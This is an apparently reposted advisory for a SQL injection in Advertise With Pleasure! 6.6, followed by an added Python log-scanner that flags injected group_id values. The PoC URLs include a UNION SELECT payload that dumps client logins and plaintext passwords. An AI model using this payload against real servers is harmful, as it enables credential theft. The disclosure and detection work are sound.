Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability

6.6 SQL Injection Vulnerability

2014/12/11 Author: unknown Source: collected by 华盟

  # Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability

  # Date: 12/02/2014

  # Author: Robert Cooper (robertc[at]areyousecure.net)

  # Software Link: http://www.guruperl.net/products/awppro/

  # Tested on: [Linux/Windows 7]

  # Vulnerable Parameter: group_id=

  ##############################################################

  PoC:

  http://server/cgi/client.cgi?act=list_zone&group_id=1'

  http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client--

  (Passwords are stored in plaintext)

  ##############################################################

  http://www.areyousecure.net
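  Added example, not part of the original advisory: a log check that flags requests to client.cgi whose group_id value is not a plain integer, including values hidden behind nested URL-encoding or sent with raw spaces. It assumes combined-format access logs and that legitimate group_id values are short non-negative integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format), not from the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Dec/2014:10:00:01 +0000] "GET /cgi/client.cgi?act=list_zone&group_id=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Dec/2014:10:02:13 +0000] "GET /cgi/client.cgi?act=list_zone&group_id=1%27 HTTP/1.1" 500 312',
    '192.0.2.44 - - [11/Dec/2014:10:02:20 +0000] "GET /cgi/client.cgi?act=list_zone&group_id=1%2527 HTTP/1.1" 500 312',
    '192.0.2.44 - - [11/Dec/2014:10:02:31 +0000] "GET /cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2 HTTP/1.0" 200 9000',
    '192.0.2.77 - - [11/Dec/2014:10:05:00 +0000] "GET /index.html?group_id=abc HTTP/1.1" 200 800',
]

# Lazy match up to " HTTP/x.y" so request targets containing raw spaces stay whole.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/\d(?:\.\d)?"')
# Assumption: a legitimate group_id is a short non-negative integer.
VALID_ID_RE = re.compile(r"\d{1,10}")


def decode_fully(value, rounds=3):
    """Undo nested URL-encoding, e.g. %2527 -> %27 -> single quote."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_group_ids(line):
    """Return the decoded group_id values in one log line that are not plain integers."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    path, _, query = match.group(1).partition("?")
    if not path.endswith("/client.cgi"):
        return []  # only the script named in the advisory is of interest
    hits = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if decode_fully(name) == "group_id":
            value = decode_fully(raw)
            if not VALID_ID_RE.fullmatch(value):
                hits.append(value)
    return hits


def scan(lines):
    """Map 1-based line number to the offending group_id values found on that line."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := suspicious_group_ids(line))}


if __name__ == "__main__":
    for lineno, values in scan(SAMPLE_LOG).items():
        print(lineno, values)
```

  Values sent in a POST body do not appear in access logs, so this check covers query-string requests only.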


